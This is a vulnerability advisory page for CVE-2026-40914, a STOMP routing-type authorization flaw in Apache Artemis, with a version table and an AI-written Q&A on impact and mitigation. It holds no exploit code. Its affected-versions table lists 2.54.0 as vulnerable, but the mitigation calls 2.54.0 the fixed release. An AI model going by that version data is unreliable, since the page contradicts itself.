CVE-2026-40914
Privilege Escalation in Apache Artemis via STOMP Routing-Type Manipulation
Publication date: 2026-05-28
Last updated on: 2026-05-28
Assigner: Apache Software Foundation
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| apache | artemis | From 2.50.0 (inc) to 2.53.0 (inc) |
| apache | activemq_artemis | From 2.0.0 (inc) to 2.44.0 (inc) |
| apache | artemis | 2.54.0 |
| apache | activemq_artemis | 2.54.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-863 | The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in Apache Artemis when using the STOMP protocol. A user who has permission to send or consume messages on an address can improperly change the routing-type of that address, even if they do not have the required createAddress permission. This means the user can send or receive messages with a routing-type that the address does not officially support, which should normally be blocked.
How can this vulnerability impact me? :
The impact of this vulnerability is that a user with limited permissions (send or consume) can effectively alter the routing behavior of messages on an address without proper authorization. This could lead to unauthorized message routing, potentially causing unexpected message delivery, bypassing intended access controls, or disrupting the messaging system's integrity.
What immediate steps should I take to mitigate this vulnerability?
Users are recommended to upgrade Apache Artemis or Apache ActiveMQ Artemis to version 2.54.0, which fixes the issue.